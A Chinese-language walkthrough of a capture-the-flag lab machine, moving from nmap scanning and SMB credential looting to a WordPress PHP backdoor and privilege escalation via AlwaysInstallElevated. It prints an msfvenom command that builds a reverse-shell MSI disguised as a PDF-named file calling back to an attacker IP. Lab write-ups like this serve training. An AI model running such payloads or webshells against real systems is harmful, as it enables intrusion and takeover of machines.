启程:
其实这个靶场本来按计划走的话,周日才会做到,但是有个佬告诉我可以先做一下,那必然得提高他的优先级,老样子我们扫一下目标靶机开放端口,简单分析一下,2端口不用看没有匿名访问的提示,80端口可以看一下存在服务可能需要进行扫目录,135,139和445果断考虑使用smbclient搞一下,看看有没有可以访问的共享目录,3306没有账户和密码不做考虑
PORT STATE SERVICE VERSION
21/tcp open ftp FileZilla ftpd 0.9.41 beta
| ftp-syst:
|_ SYST: UNIX emulated by FileZilla
80/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.51.55/dashboard/
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| tls-alpn:
|_ http/1.1
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after: 2019-11-08T23:48:47
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
| http-title: Welcome to XAMPP
|_Requested resource was https://192.168.51.55/dashboard/
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds?
3306/tcp open mysql?
| fingerprint-strings:
| NULL:
|_ Host '192.168.49.51' is not allowed to connect to this MariaDB server
5040/tcp open unknown
7680/tcp open pando-pub?
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.94SVN%I=7%D=3/26%Time=67E37155%P=x86_64-pc-linux-gnu%r
SF:(NULL,4C,"H\0\0\x01\xffj\x04Host\x20'192\.168\.49\.51'\x20is\x20not\x20
SF:allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows 10 1909 (95%), Microsoft Windows Server 2019 (95%), Microsoft Windows Server 2008 SP1 or Windows Server 2008 R2 (92%), Microsoft Windows 11 21H2 (91%), Microsoft Windows 7 (91%), Microsoft Windows 10 1709 - 1909 (90%), Microsoft Windows Server 2008 SP1 (89%), Microsoft Windows XP SP3 (88%), Microsoft Windows 10 (88%), Microsoft Windows Server 2008 R2 or Windows 8.1 (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-03-26T03:18:15
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
1 0.27 ms 192.168.49.1
2 1.15 ms 192.168.51.55
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 176.79 seconds访问80端口发现搭载着php服务,可能存在php后门执行一类的,需要多注意一下,然后没看到其他功能点,连登录口都没有,扫目录也没发现登录界面和其他有趣信息,注意这里我是使用了20万条目录的大字典确认过的,所以我以为关键点不在目录上(但是这里就埋了一个伏笔)
然后我果断看向smb共享目录,我当时在想如果这个没有东西的话,估计就得寄了,但是看到了一些有趣的文件
果断全部下载,其中有点意思的是前两个文件,都有一堆类似登录的票据,排了一下发现只有这个wordpress没办法确认,推测可能存在wordpress服务,但是上面爆目录没找到就很奇怪
后来没办法问了一下别人,他的这个目录叫shenzi,大字典居然不包括我是真服了,然后拿上面的票据成功登录wordpress
三件套插件,php页面,插件版本,但是优先尝试php页面插入php后门,因为这个操作起来比较简单,看了一下我们果然具备插入的权限,果断插入404页面,然后后门构造的地址我放后面链接了
然后我们到这个目录底下直接访问即可
这里也是成功拿下shell
然后我们上传一下winpeasany,进行一下枚举,发现有个ntlm2hash,但是没用解不出来,解出来其实也没用,单纯就是闲的
关键的是这个alawysinstallelevated,这个代表什么呢,代表只要上传一个构造好的msi后门,就可以直接获得管理员权限的shell
这里就是构造了,大家复制一下就不多讲了
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.180 LPORT=443 -f msi > BonusCompensationPlanpdf.msi上传之后直接运行msi程序便可收到管理员shell
这里我们也是成功获得管理员权限shell,完美结束
总结:
有意思的靶机可以关注一下,那个扫目录的形式可以多注意下,提权这个点也得看一下,其他就没啥了,中等难度
https://github.com/peass-ng/PEASS-ng/releases/tag/20250320-91fb36a0